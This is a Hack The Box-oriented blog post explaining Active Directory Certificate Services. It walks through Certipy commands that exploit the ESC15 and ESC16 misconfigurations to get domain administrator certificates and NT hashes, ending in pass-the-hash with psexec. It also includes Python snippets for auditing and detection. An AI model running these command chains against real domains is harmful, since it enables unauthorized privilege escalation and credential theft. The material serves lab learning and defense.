Introduction:
As I've continued to progress on my Hack The Box (HTB) journey I've kept running into interesting ways to escalate privileges, especially while doing Capture The Flags (CTFs) on Windows servers. One of those interesting ways is through Active Directory Certificate Services (AD CS) certificate templates and certificate service accounts. I've had many cases in which I identified vulnerabilities / attack vectors such as ESC15 and ESC16.
I'll be using this opportunity to write a quick blog post documenting my understanding of AD CS and its attack vectors through tools such as Certipy.
What is AD CS?
Active Directory Certificate Services (AD CS) is a critical role within any Active Directory environment. AD CS is primarily used for managing and issuing public key infrastructure (PKI) certificates.
PKI certificates are a critical component of internet and domain security. They have multiple uses, primarily authentication (SSL/TLS), encryption and code signing. Overall, certificates provide a form of identification for accessing internal domain services over secure network protocols.
AD CS automates the certificate life-cycle management process which includes issuing, renewing and revoking certificates.
What is a CA?
A Certificate Authority (CA) is a trusted entity that issues digital certificates. The CA is used to verify the identity of individuals, websites or businesses.
Within Active Directory the CA is a service that issues and manages digital certificates used for secure authentication and communication within a network.
What are certificates & certificate templates used for?
AD certificate templates are used to directly define the settings and rules for issuing digital certificates within an AD environment.
When a certificate request is directed to a CA, the CA applies the template's settings and rules to issue or renew the requested certificate, ensuring it's valid for the intended use.
How can certificates be used to escalate privilege?
Through tools such as Certipy, a powerful toolkit used for both enumeration and exploitation of AD CS. By default Certipy identifies and exploits all known ESC1-ESC16 attack vectors.
For further information on the capabilities of Certipy I would recommend checking the Certipy wiki (linked in the references).
Installing Certipy :
Dependencies:
python3
python3-pip
Install the dependencies:
sudo apt install python3 python3-pip
Then, from a Python venv:
pip install certipy-ad
Alternative:
Directly from APT:
sudo apt install certipy-ad
Checking For Vulnerable Certificate Templates:
Using a Compromised Account and password:
certipy-ad find -vulnerable -u 'CompromisedAcc' -p 'Password' -dc-ip IPAddress -stdout
Using a Compromised Account and hash:
certipy-ad find -vulnerable -u 'CompromisedAcc' -hashes 'NTLM Hash' -dc-ip IPAddress -stdout
The Certipy scan will retrieve important details such as the CA Server and Domain Controller, which I would recommend noting down:
[*] Successfully retrieved CA configuration for 'DOMAIN-CA-1'
[*] Checking web enrollment for CA 'DOMAIN-CA-1' @ 'DC01.DOMAIN.com'
Example Vulnerability Detection:
[!] Vulnerabilities
ESC15: Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15: Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
Please note that even if Certipy detects the vulnerability, it is only applicable to environments where the vulnerability has not been patched.
Also note that it can be beneficial to run a Certipy scan without the -vulnerable flag, to look at all certificate templates rather than only those flagged as vulnerable, as this can help decide the direction in which to escalate privileges.
Privilege Escalation with ESC15:
ESC15, aka "EKUwu" (CVE-2024-49019), is an AD CS security vulnerability within Microsoft's Extended Key Usage (EKU) handling, under OID 1.3.6.1.4.1.311. ESC15 allows us to specify an Application Policy which isn't listed within the certificate template's EKU. For example, we can request a certificate from a vulnerable template (one using schema version 1) with the 'Client Authentication' application policy, specifying the UPN of any account.
Example Command:
certipy req -ca 'DOMAIN-CA-1' -target-ip 'IPAddress' -u 'CompromisedAcc' -p 'Password' -template "Vulnerable Template Name" -upn "administrator@domain.com" -application-policies 'Client Authentication'
Upon successful execution of this command, you should be presented with a '.pfx' file containing the certificate and its private key.
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
From there we can use the 'administrator.pfx' file to authenticate to an LDAP shell with domain admin privileges.
certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72' -ldap-shell
Privilege Escalation with ESC16:
Another privilege escalation method exploits a configuration flaw in AD CS where the security extension is globally disabled on the CA. Essentially, the security extension 'szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2)' is not included in any of the issued certificates.
[!] Vulnerabilities
ESC16: Security Extension is disabled.
[*] Remarks
ESC16: Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates:
[!] Could not find any certificate templates
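The two conditions Certipy reports above (ESC15: schema version 1 template where the enrollee supplies the subject; ESC16: the CA's security extension disabled) can also be audited offline from exported template attributes and CA configuration. This is an added example written for this post, not Certipy's own code; the template records, the patched flag and the manager-approval check (a mitigating control beyond the two-condition description above) are my assumptions, and the flag values and OID are from Microsoft's template documentation.

```python
"""Offline audit of exported AD CS data for the ESC15 and ESC16
conditions described in this post. Added example, not Certipy code.
Template records are constructed and modelled on the LDAP attributes
of pKICertificateTemplate objects."""

# CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit of msPKI-Certificate-Name-Flag
ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# CT_FLAG_PEND_ALL_REQUESTS (manager approval) bit of msPKI-Enrollment-Flag
PEND_ALL_REQUESTS = 0x00000002
# szOID_NTDS_CA_SECURITY_EXT, the extension ESC16 finds disabled
NTDS_CA_SECURITY_EXT = "1.3.6.1.4.1.311.25.2"

# Constructed sample templates (values chosen to exercise each branch).
TEMPLATES = [
    {"name": "WebServer", "msPKI-Template-Schema-Version": 1,
     "msPKI-Certificate-Name-Flag": ENROLLEE_SUPPLIES_SUBJECT,
     "msPKI-Enrollment-Flag": 0, "enabled": True},
    {"name": "User", "msPKI-Template-Schema-Version": 1,
     "msPKI-Certificate-Name-Flag": 0xA6000000,  # subject built from AD
     "msPKI-Enrollment-Flag": 0x29, "enabled": True},
    {"name": "LegacyApproved", "msPKI-Template-Schema-Version": 1,
     "msPKI-Certificate-Name-Flag": ENROLLEE_SUPPLIES_SUBJECT,
     "msPKI-Enrollment-Flag": PEND_ALL_REQUESTS, "enabled": True},
]


def esc15_candidates(templates, ca_patched=False):
    """Names of enabled schema-v1 templates where the requester supplies
    the subject. Manager approval blocks unattended issuance, and a CA
    patched for CVE-2024-49019 removes the issue entirely."""
    if ca_patched:
        return []
    return [t["name"] for t in templates
            if t["enabled"]
            and t["msPKI-Template-Schema-Version"] == 1
            and t["msPKI-Certificate-Name-Flag"] & ENROLLEE_SUPPLIES_SUBJECT
            and not t["msPKI-Enrollment-Flag"] & PEND_ALL_REQUESTS]


def esc16_disabled(disable_extension_list):
    """True when the CA policy module's DisableExtensionList (readable
    on the CA with: certutil -getreg policy\\DisableExtensionList)
    suppresses the security extension on every issued certificate."""
    return NTDS_CA_SECURITY_EXT in disable_extension_list
```

Feed the functions the template attributes from an LDAP export and the CA's DisableExtensionList value; any ESC15 candidate should be deprecated or moved to manager approval, and a True from esc16_disabled means the CA is not binding certificates to account SIDs.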
To exploit this we would need to obtain the victim account's credential cache; this can be obtained through Certipy's shadow credentials module:
certipy shadow -u 'CompromisedACC' -p 'Password' -dc-ip 'IPAddress' -account 'victim' auto
export KRB5CCNAME=victim.ccache
certipy account -u 'CompromisedACC' -p 'Password' -dc-ip 'IPAddress' -upn 'administrator' -user 'victim' update
Request a certificate as the 'victim' user from any suitable client authentication template (e.g. 'User') via the ESC16-vulnerable Certificate Authority.
certipy req -k -dc-ip 'IPAddress' -target 'DC01.Domain.com' -ca 'Domain-DC01-CA' -template 'User'
Revert the 'victim' account back to its original UPN, to ensure there are no authentication issues when using the administrator pfx.
certipy account -u 'CompromisedACC' -p 'Password' -dc-ip 'IPAddress' -upn 'victim@Domain.com' -user 'victim' update
Then we can authenticate as the administrator using the generated pfx certificate, which gives us the administrator's NT hash.
certipy auth -dc-ip 'IPAddress' -pfx 'administrator.pfx' -username 'administrator' -domain 'domain.com'
From there you can use the hash to authenticate to the target host as administrator.
impacket-psexec -hashes 'HASH' Administrator@IPAddress
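The ESC16 chain above leaves a distinctive trace: the victim's UPN is changed to another account's name, a certificate is issued to the victim, and the UPN is reverted minutes later. Added example (mine, not from the post or Certipy) of correlating that sequence over constructed, simplified event records; it assumes Windows event 4738 (user account changed) carries the new UPN and CA event 4887 (certificate issued) carries the requester, with the field names below being my own simplification.

```python
"""Detection of the UPN swap used in the ESC16 chain: an account is
given a UPN naming a different account, then a certificate is issued
to it shortly afterwards. Added example; event shapes are constructed
and simplified (4738 = user account changed, 4887 = certificate issued)."""
from datetime import datetime, timedelta

# Constructed sample events, in time order, for a domain "domain.com".
EVENTS = [
    {"time": "2025-01-10T09:00:00", "id": 4738, "target": "victim",
     "upn": "administrator"},
    {"time": "2025-01-10T09:00:40", "id": 4887,
     "requester": "DOMAIN\\victim", "template": "User"},
    {"time": "2025-01-10T09:01:10", "id": 4738, "target": "victim",
     "upn": "victim@domain.com"},
    {"time": "2025-01-10T11:00:00", "id": 4738, "target": "jdoe",
     "upn": "jdoe@domain.com"},
]


def upn_owner(upn):
    """Account name a UPN should belong to: the part before '@', if any."""
    return upn.split("@", 1)[0].lower()


def find_upn_swaps(events, window=timedelta(minutes=10)):
    """Return (account, borrowed_upn, template) for every 4738 that gives
    an account a UPN naming a different account and is followed, within
    the window, by a certificate issued to that same account (4887)."""
    hits = []
    for i, ev in enumerate(events):
        if ev["id"] != 4738 or upn_owner(ev["upn"]) == ev["target"].lower():
            continue
        t0 = datetime.fromisoformat(ev["time"])
        for later in events[i + 1:]:
            if datetime.fromisoformat(later["time"]) - t0 > window:
                break
            requester = later.get("requester", "").split("\\")[-1].lower()
            if later["id"] == 4887 and requester == ev["target"].lower():
                hits.append((ev["target"], ev["upn"], later["template"]))
                break
    return hits
```

In a real deployment the 4738 events come from the domain controllers' Security log and 4887 from the CA host, so both sources need to be in the same SIEM with synchronised clocks for the window to be meaningful.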
References:
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation
https://www.okta.com/identity-101/public-key-infrastructure/
https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc